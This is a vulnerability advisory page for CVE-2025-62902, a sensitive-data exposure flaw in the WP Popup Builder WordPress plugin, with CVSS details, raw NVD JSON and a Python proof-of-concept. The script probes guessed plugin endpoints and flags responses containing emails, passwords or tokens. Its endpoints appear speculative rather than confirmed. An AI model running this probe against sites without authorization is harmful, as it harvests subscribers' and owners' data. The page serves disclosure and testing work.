Security Vulnerability Report
中文
CVE-2025-62902 CVSS 5.3 MEDIUM

CVE-2025-62902

Published: 2025-10-27 02:15:49
Last Modified: 2026-04-27 18:16:29

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in ThemeHunk WP Popup Builder wp-popup-builder allows Retrieve Embedded Sensitive Data.This issue affects WP Popup Builder: from n/a through <= 1.3.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:themehunk:wp_popup_builder:*:*:*:*:*:wordpress:*:* - VULNERABLE
WP Popup Builder <= 1.3.6
WP Popup Builder <= 1.3.8 (根据不同来源)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62902 PoC - WP Popup Builder Sensitive Information Exposure # This PoC demonstrates the information disclosure vulnerability import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-62902 """ # Common endpoints that might expose sensitive data endpoints = [ '/wp-content/plugins/wp-popup-builder/', '/wp-json/wp-popup-builder/', '/wp-admin/admin-ajax.php?action=get_popup_data', '/wp-content/uploads/wp-popup-builder/', '/wp-json/api/get_popup_subscribers' ] vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: content = response.text # Check for sensitive data patterns if any(indicator in content.lower() for indicator in ['email', 'subscriber', 'password', 'api_key', 'token']): print(f'[+] Potential sensitive data found at: {url}') print(f'[+] Response length: {len(content)} bytes') vulnerable = True except requests.RequestException as e: print(f'[-] Error accessing {url}: {e}') return vulnerable if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-62902_poc.py <target_url>') print('Example: python cve-2025-62902_poc.py http://example.com') sys.exit(1) target = sys.argv[1] print(f'[*] Checking vulnerability CVE-2025-62902 on {target}') print(f'[*] Target: WP Popup Builder Plugin') if check_vulnerability(target): print('\n[!] Target appears to be vulnerable!') print('[!] Recommendation: Update WP Popup Builder to latest version') else: print('\n[*] No obvious vulnerability detected') print('[*] Manual verification recommended')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62902", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:49.320", "lastModified": "2026-04-27T18:16:28.813", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in ThemeHunk WP Popup Builder wp-popup-builder allows Retrieve Embedded Sensitive Data.This issue affects WP Popup Builder: from n/a through <= 1.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:themehunk:wp_popup_builder:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.3.6", "matchCriteriaId": "0B066552-A1D0-4486-BADF-A565B82DFC1B"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-popup-builder/vulnerability/wordpress-wp-popup-builder-plugin-1-3-6-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}